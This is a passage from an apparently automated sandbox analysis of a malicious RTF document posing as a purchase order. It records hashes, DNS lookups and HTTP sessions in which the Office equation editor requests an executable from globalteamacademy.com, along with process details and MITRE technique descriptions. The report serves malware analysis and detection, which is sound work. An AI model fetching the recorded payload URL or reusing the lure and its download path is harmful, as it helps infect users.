.E.x.p.e.r.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......648351.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	101
Entropy (8bit):	4.66825780460782
Encrypted:	false
SSDEEP:	3:M1gvkqMXCdzCtQkqMXCdzCmX1gvkqMXCdzCv:Mit2mYtC
MD5:	943CE80BE97219B81BAADC160E66887A
SHA1:	968ED0C032D72CC8EC23B213C13BD01B5937FEF4
SHA-256:	1E08249EEF6A917BC6ED8A88ED3C27CE1F6992EB0A787D743D926295E5BA6CAF
SHA-512:	E826432558240C0E183C5CD81BF827FAB2227EF166E4EC728A3AC070DF503EB61AFAE0111E50F69428FBFE1A295C3B5A774AD62E009BA19A783F8EFD0F91336C
Malicious:	false
Reputation:	low
Preview:	[doc]..PO-21004-1-Ind Expert.LNK=0..PO-21004-1-Ind Expert.LNK=0..[doc]..PO-21004-1-Ind Expert.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\Desktop\~$-21004-1-Ind Expert.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.002937124139764
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PO-21004-1-Ind Expert.doc
File size:	657778
MD5:	e15b6be79b819eea3f6f52d7a5a209a1
SHA1:	ef521215f61121ab8a9ea2672a4350d8860cc79a
SHA256:	1256ae8e8b9e0a3aaa68b4d883f404de4cb55208aabef010c04231b1a1e11edf
SHA512:	6d6c674b0dc490c76feeca23bd890b8573c794452e8c040c9080ca6a3dea22b0b48e716a05c82b7e98d67278e0ba60b44d29def6f4a2492f78b7473069a4f0dd
SSDEEP:	12288:WcpPsz9hhgnxYCsqKw6ATDivT1Zbrfq4jYOTfUIkpwk9vCLf+YfHokMQ7b27hrcA:fpEz2GXH1BZbjq4jYOTftkL61fHR27lR
File Content Preview:	{\rtf9655{\object54735246\objocx\objw4253\objh961{\\objdata289765 {\\mcGp58119747925.58119747925\\.58119747925 \\mcGp58119747925.58119747925\*\.58119747925}

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000003Eh								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 20:34:03.178940058 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:03.384111881 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:03.384337902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:03.384685040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:03.589845896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:03.968147039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:03.968400955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:04.418252945 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:04.621026039 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:04.621215105 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:04.621561050 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:04.826623917 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258471966 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258510113 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258522034 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258533955 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258546114 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258558035 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258569956 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258582115 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258598089 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258618116 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.258730888 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.258835077 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.260198116 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.260256052 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.282280922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461565971 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461608887 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461632013 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461641073 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461654902 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461668015 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461671114 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461679935 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461690903 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461707115 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461719036 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461731911 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461744070 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461755037 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461766958 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461779118 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461792946 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461803913 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461808920 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461827993 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461839914 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461852074 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461863041 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461875916 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461879015 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461903095 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461911917 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461926937 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461939096 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461954117 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461966038 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.461977959 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.461981058 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.462002993 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.462013006 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.462024927 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.462038040 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.462049007 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 20:34:05.462058067 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 20:34:05.462081909 CET	49166	80	192.168.2.22	43.252.37.193

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 20:34:03.110344887 CET	52197	53	192.168.2.22	8.8.8.8
Feb 9, 2021 20:34:03.167273998 CET	53	52197	8.8.8.8	192.168.2.22
Feb 9, 2021 20:34:03.992548943 CET	53099	53	192.168.2.22	8.8.8.8
Feb 9, 2021 20:34:04.351581097 CET	53	53099	8.8.8.8	192.168.2.22
Feb 9, 2021 20:34:04.351841927 CET	53099	53	192.168.2.22	8.8.8.8
Feb 9, 2021 20:34:04.416836977 CET	53	53099	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 9, 2021 20:34:03.110344887 CET	192.168.2.22	8.8.8.8	0x82b3	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 20:34:03.992548943 CET	192.168.2.22	8.8.8.8	0x8b68	Standard query (0)	www.globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 20:34:04.351841927 CET	192.168.2.22	8.8.8.8	0x8b68	Standard query (0)	www.globalteamacademy.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 9, 2021 20:34:03.167273998 CET	8.8.8.8	192.168.2.22	0x82b3	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 20:34:04.351581097 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	www.globalteamacademy.com	globalteamacademy.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2021 20:34:04.351581097 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 20:34:04.416836977 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	www.globalteamacademy.com	globalteamacademy.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2021 20:34:04.416836977 CET	8.8.8.8	192.168.2.22	0x8b68	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

globalteamacademy.com

www.globalteamacademy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 20:34:03.384685040 CET	0	OUT	GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: globalteamacademy.com Connection: Keep-Alive
Feb 9, 2021 20:34:03.968147039 CET	1	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 09 Feb 2021 19:34:03 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.globalteamacademy.com/showcase/fig/CFHhMaweBF1QHvO.exe Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 20:34:04.621561050 CET	2	OUT	GET /showcase/fig/CFHhMaweBF1QHvO.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: www.globalteamacademy.com
Feb 9, 2021 20:34:05.258471966 CET	3	IN	HTTP/1.1 404 Not Found Date: Tue, 09 Feb 2021 19:34:05 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.globalteamacademy.com/wp-json/>; rel="https://api.w.org/" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 32 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 32 2e 32 2e 31 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 Data Ascii: 1291<!DOCTYPE html><html lang="en-US" class="no-js"><head><meta charset="UTF-8" /><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.globalteamacademy.com/xmlrpc.php" /><title>Page not found – Global Team Academy</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Global Team Academy » Feed" href="http://www.globalteamacademy.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Global Team Academy » Comments Feed" href="http://www.globalteamacademy.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl"
Feb 9, 2021 20:34:05.258510113 CET	5	IN	Data Raw: 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 32 2e 32 2e 31 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b Data Ascii: :"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.globalteamacademy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.19"}};!function(a,b,c){function d(a){var b,c,d,e,f=String
Feb 9, 2021 20:34:05.258522034 CET	6	IN	Data Raw: 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 63 2e 73 75 70 70 6f 72 74 73 5b 69 5b 68 5d 5d 29 3b 63 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 63 2e 73 75 70 70 6f Data Ascii: ts.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything\|\|(g=function(){c.readyCallback()},b.addE
Feb 9, 2021 20:34:05.258533955 CET	7	IN	Data Raw: 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f Data Ascii: -form-7-css' href='http://www.globalteamacademy.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.2' type='text/css' media='all' /><link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.globalteamacademy.com
Feb 9, 2021 20:34:05.258546114 CET	8	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 74 68 65 6d 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 20 7b 20 20 63 6f 6c 6f 72 3a 20 23 33 44 33 32 34 32 3b 20 20 66 6f 6e 74 2d Data Ascii: 2000<style id='theme-inline-css' type='text/css'>body { color: #3D3242; font-size: 15px; font-family: Hind Siliguri; font-weight: 0; font-style: normal; } h1, h2, h3, h4, h5, h6 { font-family: Hind Vadodara; font-weight: 700; font-s
Feb 9, 2021 20:34:05.258558035 CET	10	IN	Data Raw: 63 5f 72 6f 77 5f 77 72 61 70 2c 2e 70 61 67 65 2d 66 75 6c 6c 77 69 64 74 68 20 23 70 61 67 65 2d 62 6f 64 79 20 23 72 65 73 70 6f 6e 64 2c 2e 70 61 67 65 2d 66 75 6c 6c 77 69 64 74 68 20 23 70 61 67 65 2d 62 6f 64 79 20 2e 6e 6f 63 6f 6d 6d 65 Data Ascii: c_row_wrap,.page-fullwidth #page-body #respond,.page-fullwidth #page-body .nocomments { width: 1110px; } body.layout-boxed #site-wrapper,body.layout-boxed #site-wrapper #masthead-sticky,body.layout-boxed #site-wrapper #masthead.header-v7 { w
Feb 9, 2021 20:34:05.258569956 CET	11	IN	Data Raw: 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e Data Ascii: ut[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus,input.input-text:focus,select:focus,#site-wrapper .vc_tta-accordion .vc_tta-panel-heading .vc_tta-panel-titl
Feb 9, 2021 20:34:05.258582115 CET	12	IN	Data Raw: 20 2e 62 6c 6f 67 2d 73 68 6f 72 74 63 6f 64 65 2e 62 6c 6f 67 2d 67 72 69 64 20 2e 68 65 6e 74 72 79 20 2e 65 6e 74 72 79 2d 63 6f 76 65 72 20 2e 65 6e 74 72 79 2d 74 69 6d 65 2c 0a 2e 62 6c 6f 67 20 2e 68 65 6e 74 72 79 20 2e 65 6e 74 72 79 2d Data Ascii: .blog-shortcode.blog-grid .hentry .entry-cover .entry-time,.blog .hentry .entry-content .readmore .more-link:hover,#site-footer,#site-wrapper .testimonial .testimonial-image::after,.blog .hentry.sticky,.single-post .hentry .entry-footer
Feb 9, 2021 20:34:05.258598089 CET	14	IN	Data Raw: 20 6c 69 20 2e 61 64 64 5f 74 6f 5f 63 61 72 74 5f 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 70 72 6f 64 75 63 74 73 20 6c 69 20 2e 61 64 64 5f 74 6f 5f 63 61 72 74 5f 62 75 74 74 6f 6e 2c 0a 2e 77 69 64 67 Data Ascii: li .add_to_cart_button, .woocommerce-page .products li .add_to_cart_button,.widget.widget_product_tag_cloud .tagcloud a,.widget_shopping_cart .buttons .button.checkout, .widget_shopping_cart_content .buttons .button.checkout,.widget.widget
Feb 9, 2021 20:34:05.258618116 CET	15	IN	Data Raw: 2c 20 68 35 20 69 2c 20 68 36 20 69 2c 0a 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 70 6f 73 74 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 6c 69 20 61 20 73 70 61 6e 2c 0a 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 72 65 63 Data Ascii: , h5 i, h6 i,.navigation.post-navigation .nav-links li a span,.widget.widget_recent_comments ul li::after,.header-v4 #site-header #masthead #site-brand .wrapper .header-widgets .widget .info-icon i,.projects.projects-grid .projects-items .
Feb 9, 2021 20:34:05.461565971 CET	17	IN	Data Raw: 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 20 0a 62 75 74 74 6f 6e 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 73 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 0a 2e 62 75 74 74 6f 6e 2e 73 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 0a 2e 62 67 2d 73 63 68 Data Ascii: cheme2:hover, button[type="submit"].scheme2:hover,.button.scheme2:hover,.bg-scheme2,#site-header #headerbar .top-navigator .menu li .sub-menu li a::before,#site-head1218er #masthead #site-navigator .menu li .sub-menu li a::before,#si

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2420 Parent PID: 584

General

Start time:	20:33:39
Start date:	09/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fe80000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2544 Parent PID: 584

General

Start time:	20:33:41
Start date:	09/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2880 Parent PID: 584

General

Start time:	20:34:01
Start date:	09/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
